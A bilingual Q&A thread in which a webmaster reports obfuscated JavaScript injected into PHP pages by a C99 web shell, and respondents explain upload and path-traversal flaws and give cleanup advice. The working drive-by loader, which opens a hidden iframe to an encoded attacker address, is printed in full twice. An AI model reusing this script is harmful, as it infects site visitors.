PHP脚本:末尾有恶意JavaScript代码
问题:
在我的网站空间中,有一些 PHP 文件都以此结尾:
<?php include 'footer.php'; ?>
在这一行之前,文件中还有 HTML 代码。
浏览器中的输出当然是这样结束的:
</body>
</html>
但是昨天,最后突然出现了一些恶意代码。我的 index.php 的输出是:
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
我在我的网站空间上打开了该文件(通过 FTP 下载),我看到有人已将此代码直接放入该文件中!
这怎么可能发生?
我能想到的唯一方法是:
- 有人得到了我的 FTP 密码。但他不会只将其放入一个文件中。他本可以造成更大的伤害。所以我无法想象事情会是这样。
- 我自己的电脑上有病毒。我使用 Notepad++ 进行编辑,使用 FileZilla 进行上传。也许这些程序也被污染了,我在不知情的情况下上传了恶意代码。
- 有人使用安全漏洞 (XSS) 将该代码放入页面中。但他不可能把它直接放入档案中,不是吗?
症状:
用户报告 Firefox 中弹出蓝色面板。它要求他们安装一个插件。现在,其中一些人的 PC 上有 Exploit.Java.CVE-2010-0886.a。
这是由于恶意代码吗?这段代码到底做了什么?
你能帮助我吗?
请帮助我,我真的很绝望。
也许还有一个问题,如果你知道我是如何得到它的:我怎样才能防止将来发生类似的事情?
编辑#1:
我在我的网站空间的根目录中找到了一个名为“x76x09.php”的文件。它的文件大小为 44.281 字节。我已经下载并尝试打开它。但我的防病毒软件说这是一个木马(Trojan.Script.224490)。我认为该文件已被执行并将恶意代码添加到每个目录的“index.php”中。这有帮助吗?该木马如何进入我的网站空间?这是一种众所周知的病毒吗?
编辑 #2:
我的托管服务商说他现在可以确定该文件不是通过 FTP 上传的。所以感染不是通过 FTP 发生的。根据我的主机的说法,这一定是不安全的脚本。
编辑 #3:
根据 PHPSecInfo 的安全漏洞:
- allow_url_fopen =
- 1allow_url_include = 1
- Exposure_php = 1
- file_uploads = 1(这是恶意“x76x09.php”文件的罪魁祸首吗?)
- group_id = 99
- user_id = 99
编辑#4:
我已经分析了在我的网络服务器上执行的文件。 结果如下。
所以这个病毒似乎被称为:
- PHP/C99Shell.BF
- Backdoor/PHP.C99Shell
- BackDoor.Generic_c.CQA
- Trojan.Script.224490
- Exploit.PHP.635
- Backdoor.PHP.C99Shell.bf
- Trojan.Script.224490
可能其中一些导致我的网站空间上的恶意文件添加了恶意代码?
The problem:
On my webspace there are PHP files which all end with this:
<?php include 'footer.php'; ?>
Before this line, there is also HTML code in the files.
The output in the browser ends with this, of course:
</body>
</html>
But yesterday, there was some malicious code at the end, suddenly. The output of my index.php was:
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
I opened the file on my webspace (downloaded via FTP) and I saw that someone had put this code right into the file!
How could this happen?
The only ways I can imagine:
- Somebody got my FTP password. But he wouldn't only have put it into one file. He could have done much more damage. So I can't imagine this is the case.
- I have a virus on my PC myself. I use Notepad++ for editing and FileZilla for uploading. Maybe these programs were contaminated as well and I uploaded the malicious code - without knowing.
- Someone used a security hole (XSS) to put that code into the page. But he couldn't have put it right into the file, could he?
Symptoms:
Users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.
Is this due to the malicious code? What did the code do exactly?
Can you help me?
Please help me, I'm really desperate.
Maybe one additional question, if you know how I could have got it: How could I prevent something like this in the future?
Edit #1:
I've found a file called "x76x09.php" in the root directory of my webspace. It has a filesize of 44.281 bytes. I've downloaded it and tried to open it. But my antivirus software said it's a trojan (Trojan.Script.224490). I think this file has been executed and added the malicious code to the "index.php" in every directory. Does this help? How could the trojan come to my webspace? Is this a well-known virus?
Edit #2:
My hoster says he can now be sure that the file wasn't uploaded via FTP. So the infection didn't happen via FTP. According to my hoster, it must be insecure scripts.
Edit #3:
Security holes according to PHPSecInfo:
- allow_url_fopen = 1
- allow_url_include = 1
- expose_php = 1
- file_uploads = 1 (is this to blame for the malicious "x76x09.php" file?)
- group_id = 99
- user_id = 99
Edit #4:
I've analyzed the file which had been executed on my webserver. Here's the results.
So this virus seems to be known as:
- PHP/C99Shell.BF
- Backdoor/PHP.C99Shell
- BackDoor.Generic_c.CQA
- Trojan.Script.224490
- Exploit.PHP.635
- Backdoor.PHP.C99Shell.bf
- Trojan.Script.224490
Could some of them cause the malicious file on my webspace which added the malicious code?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(10)
我不认为问题在于您使用的是共享主机,因为我发现了其他六个(degmsb< /a>, Benvolio, joomla01, DJ 外星人,valerione1979 和 Kars),其网站添加了相同的脚本。此外,您的任何文件能否被其他人写入也是值得怀疑的,因为通过 FTP 上传的文件受文件创建模式位掩码的约束。
我最好的猜测是,有人正在使用已知的漏洞或针对常见弱点的漏洞来破解网站,并且此人正在使用 Google 黑客攻击。 degmsb 的 Wordpress 网站和 Benvolio 的 Burning Board Lite 网站很可能是通过已知的漏洞(可能是这些软件库的插件的已知漏洞,例如 TinyMCE)被破解的,而您的网站,因为您自己编写的,很可能是通过针对常见网站的漏洞被破解的弱点。
鉴于您允许文件上传(您的 PHP 脚本之一接受并保存用户上传的文件),我会考虑 CWE-434:无限制上传危险类型的文件。 CWE-434 漏洞利用的工作原理如下:假设您允许用户上传头像图像或图片。上传图像的 POST 脚本可能会使用用户提供的相同文件名将文件保存到
/images。现在假设有人上传x76x09.gif.php(或x76x09.gif.asp、x76x09.gif.php4等)。您的脚本会尽职尽责地将上传的内容保存到/images/x76x09.gif.php,而破解者需要做的就是让服务器运行此脚本,浏览到/images/x76x09.gif .php。即使该文件名为x76x09.php.gif,某些 Web 服务器也会执行该文件。另一种可能性是 PHP 接收到的上传文件名
$_FILES['upload']['name'],即文件中的标头被构造为类似filename值发送的 Content-Disposition..\modules\x.gif的内容。如果您的脚本将新上传的文件保存到str_replace('\\', '/', '/images/' .basename($_FILES['upload']['name'])),或非 Windows 主机上的/images/../modules/x.gif(http: //codepad.org/t83dYZwa),并且用户可以通过某种方式使您的 PHP 脚本之一include或require中的任何脚本modules目录(例如index.php?module=x.gif&action=blah),那么破解者就能够执行任意 PHP。编辑:它看起来像
x76x09。 php是某种不受限制的目录浏览器和文件上传器。如果用户设法将其上传到您的服务器,那么他们基本上可以执行您可以通过 FTP 访问执行的任何操作。 删除它。编辑2:查找此 PHP 源(部分
gzuncompress(base64_decode("HJ3H...geFb//eeff/79z/8A"));)。 从所有 PHP 脚本中删除它。EDIT3: 在 Google 上搜索 PHP 脚本的各个部分,我发现了几个网页,其中逐字列出了该源代码,并且所有这些页面都有与各个网站的文件上传功能有关。因此,您网站的黑客很可能使用了 CWE-434 漏洞。
I don't think that the problem is that you are using a shared host because I have found six others (degmsb, Benvolio, joomla01, DJ-Alien, valerione1979, and Kars) whose websites had the same script added. Also, it is doubtful that any of your files would be writable by others because files that are uploaded over FTP are subject to the file creation mode bits mask.
My best guess is that someone is cracking websites using either known exploits or exploits against common weaknesses, and that this person is identifying likely targets with Google hacking. degmsb's Wordpress website and Benvolio's Burning Board Lite website were likely cracked via known exploits (possibly known exploits of plugins to these software bases such as TinyMCE), and your website, since you wrote it yourself, was likely cracked via an exploit against a common website weakness.
Given that you allow file uploads (one of your PHP scripts accepts & saves files that are uploaded by your users), I would consider CWE-434: Unrestricted Upload of File with Dangerous Type. A CWE-434 exploit works like this: suppose you allow users to upload avatar images or pictures. The script to which uploaded images are POSTed might save the file to
/imagesusing the same filename that the user supplied. Now imagine that someone uploadsx76x09.gif.php(orx76x09.gif.asp,x76x09.gif.php4, etc.). Your script will dutifully save this upload to/images/x76x09.gif.phpand all that the cracker needs to do to have the server run this script is browse to/images/x76x09.gif.php. Even if the file is namedx76x09.php.gif, some web servers will execute the file.Another possibility is that the filename of the upload that PHP receives,
$_FILES['upload']['name'], which is thefilenamevalue in theContent-Dispositionheader that is sent, was constructed to something like..\modules\x.gif. If your script saved the newly-uploaded file tostr_replace('\\', '/', '/images/' . basename($_FILES['upload']['name'])), or/images/../modules/x.gifon a non-Windows host (http://codepad.org/t83dYZwa), and there was some way for the user to cause one of your PHP scripts toincludeorrequireany script in themodulesdirectory (sayindex.php?module=x.gif&action=blah), then the cracker would be able to execute arbitrary PHP.EDIT: It looks like
x76x09.phpis some sort of unrestricted directory browser and file uploader. If a user manages to get this uploaded to your server, then they can basically do anything that you can do with your FTP access. Delete it.EDIT2: Look for copies of this PHP source (the part
gzuncompress(base64_decode("HJ3H...geFb//eeff/79z/8A"));). Remove it from all of your PHP scripts.EDIT3: Googling parts of the PHP script, I have found several webpages where this source is listed verbatim, and all of these pages have something to do with file uploading functionality for the respective websites. It therefore seems very likely that the hacker of your website used a CWE-434 exploit.
看起来您的服务器已被入侵,您也在共享主机上吗?
您可以通过以下方式查看服务器的安全配置:
PhpSecInfo
(来源:phpsec.org)
Looks like your server has been compromised, also are you on shared host?
You can find out security configuration of your server with:
PhpSecInfo
(source: phpsec.org)
你和谁一起接待?一些托管服务商存在可能被利用的安全漏洞。
您使用 WordPress 吗?据报道还发生了多起疫情。最好的办法是在谷歌上寻找有类似问题的人,这也会找到原因,从而找到解决方案。
Who are you hosted with? Some hosters have security leaks that can get exploited.
Are you using WordPress? There's also been an number of reported outbreaks. The best thing to do would be google it looking for people with similar problems, which will also lead to the cause, which will lead to the solutions.
正如其他人所建议的,该漏洞很可能存在于您正在使用的某些脚本中,可能是您自己编写的脚本,也可能是具有已知漏洞的众所周知的应用程序。这可能是上传脚本中的漏洞,但我想指出的是,也可以通过 SQL 注入“上传”文件,请参阅以下 线程了解更多详细信息
As others have suggested, the vulnerability is most likely in some script you are using, maybe something you've written yourself or then a well known application that has known vulnerabilities. This might be a vulnerability in an upload script, but I want to point out that it is also possible to "upload" files through SQL injection, see the following thread for more details
不久前,我们的一个主要网络资产也遇到了类似的问题。您的网络主机所说的是正确的:这可能不是由于 FTP 访问,而是由于不安全的脚本以某种方式允许修改任意文件。在我们的案例中,旧 phpMyAdmin 中的漏洞允许更改某些 PHP 脚本。
如果您还没有这样做,您可能需要确保 Web 服务器仅对所有脚本和 HTML 文件具有读取权限。事实证明,在我们的例子中,Apache 也可以写入脚本。简单地
We have experienced a problem similar to this a while ago with one of our major web properties. What your web host said was correct: it was likely due to not FTP access, but an insecure script that somehow allowed modification of arbitrary files. In our case, a vulnerability in an old phpMyAdmin allowed changes to some PHP scripts.
If you haven't done so already, you may want to make sure that the web server has only read privileges to all scripts and HTML files. It turns out that Apache could also write to scripts in our case. Simply
我建议更改任何 FTP 或 SSH 密码以确保安全。如果您使用托管提供商,您还应该将违规情况通知他们。如果您没有日志来调查此事,那么他们可能会这样做。您还应该搜索添加到您页面的代码,看看是否可以找到其他内容。
I would suggest changing any FTP or SSH passwords to be very secure. If you use a hosting provider you should also notify them of the breach. If you do not have logs to investigate the matter then they may. You should also Google the code that was added to your page to see if you can find anything else.
phsource 是最接近的。
如果您位于共享服务器上,其他人就可以访问该服务器本身。这有点像共享服务器的定义。问题是,如果您的文件的权限为 777,则它们是世界用户组可写的。这意味着任何有权访问该邮箱的人都可以给他们写信。看到问题了吗?
只需一个人在该机器上设置弱密码、配置不当的脚本或糟糕的代码,而平庸的脚本小子可能会导致整个机器出现各种问题。大多数这些攻击都是完全自动化的。他们获得访问权限,扫描可攻击的文件,并根据需要进行附加。
最有可能的是,您应该将所有文件更改为 755 或 644 权限。你晚上会睡得更好。
清理完毕后,请确保 Google 没有将您标记为恶意网站。清理起来并不可怕,但同时会减少您的流量。
phsource is the closest.
If you're on a shared server, other people have access to the server itself. This is sort of the definition of a shared server. The problem is that if you have files with permissions of 777, they are world-user-group writable. Which means anyone with access to the box can write to them. See the problem?
All it takes is one person on that box to have a weak password, poorly configured script, or a horrible bit of code, and a mediocre script kiddie can cause all kinds of problems all over the box. Most of these attacks are purely automated. They get access, scan for attack-able files, and append as needed.
Most likely, you should change all of your files to 755 or 644 permissions. You'll sleep better at night.
And after you're done cleaning it up, make sure Google hasn't flagged you as a malicious site. It's not horrible to clean up, but it can decimate your traffic in the meantime.
如果您自己编写了易受攻击的 Web 应用程序,那么您已经开始弄清楚在哪里可以找到大多数可被利用的访问点。不幸的是,这可能还不够好(编写和维护安全的 Web 应用程序比大多数人想象的要困难)。
如果您没有自己编写应用程序,或者您正在重复使用其他人编写的大型、复杂的组件,或者您只是需要帮助来掌握网站安全性,那么可以使用以下方法:商业服务可以抓取您的网站并尝试找出它们的弱点,例如:
这些服务显然需要花钱,但您通常可以获得“免费试用”以查看它们是否有帮助。祝你好运!
If you wrote the vulnerable web application yourself then you've already got a head start figuring out where to find most of the access points are which could be exploited. Unfortunately, that may not be good enough (writing and maintaining secure web applications is harder than most people think).
If you didn't write the application yourself, or if you're re-using large, complex, components that someone else wrote, or if you simply need help getting a handle on website security then there are commercial services that can crawl your site and try to figure out where they are vulnerable, e.g.:
These services cost money, obviously, but you can usually get a "free trial" to see if they would be helpful. Good luck!
如果您有静态 IP - 您可以禁止非您 IP 的 FTP 访问
If you has static ip - you can forbid ftp-access from not yours IP
不久前,这件事以不同的方式发生在我身上。工作帐户通过 phpBB 代码漏洞被泄露。不知何故,他们甚至将自己添加到 mySQL 数据库用户表中。这导致我们完全删除该程序并停止使用。
旧的 Joomla 安装存在一个漏洞,允许人们对我的个人网站执行您所说的操作。我什至忘记了它就在那里,但这足以为他们在几个不同的网站上安装恶意代码打开大门。我关闭了该网站,更改了权限,更新了 Joomla,并清理了文件。
在一些高峰期的黑客尝试中,我当前的生产服务器每小时“嗅探”phpMyAdmin 超过 1000 次。坏人都在加班!
最重要的是,要警惕开源代码,如果你确实使用它,请更新、更新、更新。
This happened to me a while back in different manners. A work account was compromised through phpBB via a code exploit. Somehow, they even added themselves into the mySQL db users table. That caused us to completely remove the program and discontinue use.
An old Joomla install was the vulnerability that allowed people to do exactly what you speak of to my personal site. I had forgotten it was even out there, but it was enough to open the door for them to install malicious code on several different sites. I took the site down, changed permissions, updated Joomla, and scrubbed files.
My current production server gets "sniffed" for phpMyAdmin more than 1000 times per hour during some peak hack attempts. The bad guys are working overtime!
Bottom line, be wary of open source code and if you do use it, update, update, update.